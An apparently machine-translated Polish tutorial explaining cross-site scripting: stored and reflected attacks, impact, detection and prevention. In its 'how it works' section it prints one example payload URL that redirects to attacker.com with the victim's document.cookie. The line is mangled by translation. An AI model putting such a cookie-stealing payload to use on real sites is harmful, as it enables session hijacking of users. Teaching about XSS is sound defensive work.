Co to jest skrypty między witrynami? - Jak to działa - Wpływ i rodzaje witryn krzyżowych

Spisie treści:

Anonim

Wprowadzenie do skryptów między witrynami

  • Wraz z rosnącą liczbą aplikacji internetowych, bezpieczeństwo sieciowe stało się obecnie ważnym problemem. Hakowanie i kradzież prywatnych danych użytkowników jest teraz powszechne i grozi im używanie dowolnej aplikacji. Skrypty między witrynami to jeden z popularnych ataków na bezpieczeństwo użytkowników w sieci. Zobaczmy, czym jest skrypty między witrynami.
  • Cross Site Scripting określane jako XSS, to luka w zabezpieczeniach komputera, w której atakujący stara się dodać szkodliwy kod w postaci skryptów do zaufanej witryny / strony internetowej. Jest to atak polegający na wstrzyknięciu kodu po stronie klienta, a złośliwy skrypt wykonuje się w przeglądarce internetowej użytkownika, gdy uzyskuje on dostęp do tej witryny / strony internetowej. Pośrednio ta strona internetowa staje się medium do wysyłania złośliwego kodu do użytkownika. Wstrzykując skrypty atakujący omijają DOM (Document Object Model) ograniczeń bezpieczeństwa i uzyskują dostęp do wrażliwej zawartości strony, plików cookie sesji, historii przeglądania większości prywatnych danych przechowywanych przez przeglądarkę.
  • Witryna zawierająca fora, fora dyskusyjne, strony internetowe, które umożliwiają komentarze, oraz te, które wykorzystują niezaangażowane dane wejściowe użytkownika i tak wygenerowane dane wyjściowe, są najbardziej narażone na ataki XSS. Chociaż ataki XSS są możliwe w VBScript, ActiveX i CSS, są one najczęściej spotykane w Javascript, ponieważ jest to podstawa większości przeglądarek.

Różne typy skryptów krzyżowych (XSS)

Chociaż nie istnieje żadna szczególna klasyfikacja skryptów krzyżowych, niektórzy eksperci podzielili ją na dwa typy, które zostały szczegółowo omówione poniżej:

Przechowywane ataki XSS :

  • Przechowywane XSS to te, w których złośliwy skrypt wstrzyknięty przez atakującego jest przechowywany w bazie danych i uruchamiany w przeglądarce użytkownika, gdy próbuje on uzyskać dostęp do bazy danych w jakiejś formie. Są one również znane jako trwałe lub przechowywane XSS. Jest to jeden z najbardziej niszczycielskich ataków i ma miejsce szczególnie wtedy, gdy strona internetowa / strona internetowa umożliwia komentowanie lub pozwala na osadzanie treści HTML.
  • Atakujący dodaje javascript w komentarzu, który jest przechowywany w bazie danych, a gdy użytkownik uzyskuje dostęp do strony, której dotyczy problem, i pobiera dane z bazy danych, które złośliwy skrypt działa w przeglądarce, a atakujący uzyskuje nieautoryzowany dostęp do prywatnych danych użytkownika.
  • Na przykład w witrynie e-commerce, takiej jak Olx, w której znajduje się niezamówione okno komunikatu do opisu produktu, osoba atakująca będąca sprzedawcą produktu dodaje do niej złośliwy kod JavaScript i zostanie zapisana w bazie danych witryny.
  • Gdy kupujący otworzy opis produktu, aby wyświetlić szczegóły produktu, stanie się on ofiarą, gdy skrypt zostanie uruchomiony w przeglądarce internetowej, a wszystkie szczegóły użytkownika, na które pozwala przeglądarka, zostaną przejęte.

Procedura Ataki XSS:

  • Jest to jeden z najczęstszych sposobów, w jaki osoba atakująca może spowodować atak XSS na użytkownika. Zasadniczo w atakach Procedura XSS atakujący atakuje ofiarę, wysyłając wiadomość e-mail, złośliwy link lub dołączając ciąg wyników wyszukiwania, który wskazuje na zaufaną stronę internetową, ale zawiera złośliwy kod javascript.
  • Jeśli ofiara kliknie ten adres URL, inicjuje żądanie HTTP i wysyła żądanie do podatnej aplikacji internetowej. Żądanie następnie wraca do ofiary z odpowiedzią na osadzony kod javascript, który wykonuje przeglądarka internetowa, biorąc pod uwagę, że pochodzi on z zaufanej strony internetowej, co powoduje przechwycenie poufnych danych przeglądarki.
  • Na przykład w witrynie e-commerce znajduje się pole wyszukiwania, w którym użytkownik może wyszukiwać produkty, a ciąg zapisany w polu wyszukiwania jest widoczny w adresie URL witryny, gdy żądanie wyszukiwania jest wysyłane na serwer.
  • Atakujący tworzy link, w którym złośliwy skrypt jest konkatenowany w adresie URL i wysyła go do ofiary za pośrednictwem wiadomości e-mail. Gdy ofiara otwiera ten link, żądanie jest wysyłane do złośliwej strony atakującego, a wszystkie dane przeglądarki ofiary są przechwytywane i przesyłane do systemu atakującego.

Jak działa skrypt skryptowy między witrynami (XSS)?

  • W przypadku luki w zabezpieczeniach Cross Site Scripting (XSS) głównym motywem osoby atakującej jest kradzież danych użytkownika przez uruchomienie złośliwego skryptu w przeglądarce, który wstrzykuje treści witryny, z których korzysta użytkownik na różne sposoby.
  • Na przykład, gdy użytkownik szuka tekstu w witrynie, żądanie jest wysyłane do serwera w postaci:

https://www.abcwebsite.com/search?q=text1

W wyniku wyszukiwania witryna zwraca wynik wraz z tym, czego szukał użytkownik:

Szukałeś: tekst1

Jeśli funkcja wyszukiwania jest podatna na atak XSS, osoba atakująca może dodać złośliwy skrypt w adresie URL:

https://www.abcwebsite.com/search= położenie dokumentu = https: //attacker.com/log.php? c = '+ encodeURIComponent (document.cookie)
  • Gdy ofiara kliknie ten link, przekierowuje na złośliwą stronę internetową, tj. Https://attacker.com, a wszystkie dane przeglądarki są wysyłane bezpośrednio do komputera atakującego, co powoduje, że atakujący kradnie wszystkie tokeny sesji / pliki cookie.
  • W ten sposób atakujący wstrzykuje swój złośliwy skrypt w adres URL, a atakujący może również przechowywać ten skrypt na serwerze, który jest objęty zapisanym XSS.

Wpływ luk w zabezpieczeniach skryptów krzyżowych:

Wpływ skryptów między witrynami jest bardzo zróżnicowany. Po wykorzystaniu luki w zabezpieczeniach XSS, osoba atakująca zyskuje pełną kontrolę nad przeglądarką ofiary i może wykonywać różne czynności, od małych, takich jak przeglądanie historii przeglądarki, po katastrofalne, takie jak wstawianie robaków do komputera.

Niektóre z działań, które osoba atakująca może wykonać, wykorzystując lukę XSS, są następujące:

  1. Wyciek poufnych informacji, takich jak nazwa użytkownika i hasło.
  2. Wstawianie robaków na komputer.
  3. Przekierowywanie użytkownika na niebezpieczną stronę internetową i zmuszanie do wykonania pewnych czynności
  4. Uzyskaj dostęp do historii przeglądania ofiary.
  5. Instalacja programu konia trojańskiego.
  6. Zmuś użytkownika do wykonania i modyfikacji wartości w aplikacji poprzez uzyskanie dostępu

Znajdowanie luk w zabezpieczeniach dotyczących skryptów krzyżowych:

  • Luki w zabezpieczeniach XSS występują z dwóch powodów: dane wejściowe od użytkownika nie są sprawdzane przed wysłaniem na serwer lub dane wyjściowe otrzymane do przeglądarki nie są kodowane w formacie HTML. Mając na uwadze katastrofalny wpływ luki XSS i ochronę prywatności użytkowników, bardzo ważne jest ustalenie, czy aplikacja internetowa jest podatna na XSS, czy nie.
  • Chociaż XSS jest trudny do zidentyfikowania i usunięcia, najlepszym sposobem sprawdzenia jest przeprowadzenie przeglądu bezpieczeństwa kodu i sprawdzenie wszystkich miejsc, w których dane wejściowe z żądania HTTP mogą zostać wyświetlone jako Dane wyjściowe w aplikacji. Korzystanie z narzędzi automatycznego skanera podatności, które zawierają wyspecjalizowany moduł skanera XSS do skanowania całej aplikacji internetowej, może również pomóc w skanowaniu i znajdowaniu luk w aplikacji.

Jak zapobiec XSS?

  • XSS jest podatny na wstrzykiwanie kodu, dlatego bardzo ważne jest kodowanie danych przesyłanych do serwera oraz danych pochodzących z serwera do przeglądarki użytkownika.
  • Sprawdzanie poprawności danych jest również bardzo ważne, ponieważ przeglądarka interpretuje kod bez żadnych złośliwych poleceń. Wprowadzono różne metody zapobiegania, utrzymując walidację i kodowanie danych jako priorytet, aby strona była podatna na XSS.

Niektóre punkty wymagają skupienia, aby zapobiec XSS: -

  1. Obsługa śledzenia HTTP na wszystkich serwerach internetowych powinna być wyłączona, ponieważ osoba atakująca może ukraść dane cookie i dane prywatnej przeglądarki poprzez wywołanie śledzenia HTTP z serwera, nawet jeśli document.cookie jest wyłączony w przeglądarce ofiary.
  2. Programiści powinni zdezynfekować dane wejściowe i nigdy nie powinni wysyłać danych bezpośrednio otrzymanych od użytkownika bez ich sprawdzania.
  3. Łącza powinny być ogólnie zabronione, jeśli nie zaczynają się na protokołach z białej listy, takich jak HTTP: //, https: //, uniemożliwiając w ten sposób korzystanie ze schematów URI, takich jak javascript: //

Wniosek:

Ataki XSS są niebezpieczne i mogą zaszkodzić prywatności użytkownika i ukraść dane, chyba że normalny użytkownik dokładnie przejrzy aplikację. Dlatego programiści podczas opracowywania aplikacji powinni przestrzegać surowych zasad bezpieczeństwa, szczególnie w odniesieniu do danych i serwera, aby aplikacja była najmniej podatna na XSS, a więcej użytkowników mogło na niej polegać.

Polecane artykuły

To był przewodnik po skryptach między witrynami ?. W tym miejscu omawiamy różne rodzaje przekrojów, działania, wpływu i zapobiegania XSS. Możesz także przejrzeć nasze inne sugerowane artykuły, aby dowiedzieć się więcej -

  1. Jak działa JavaScript
  2. Co to jest atak phishingowy?
  3. Co to jest atak cybernetyczny?
  4. Buforowanie HTTP
  5. Jak działają pliki cookie w JavaScript w przykładzie?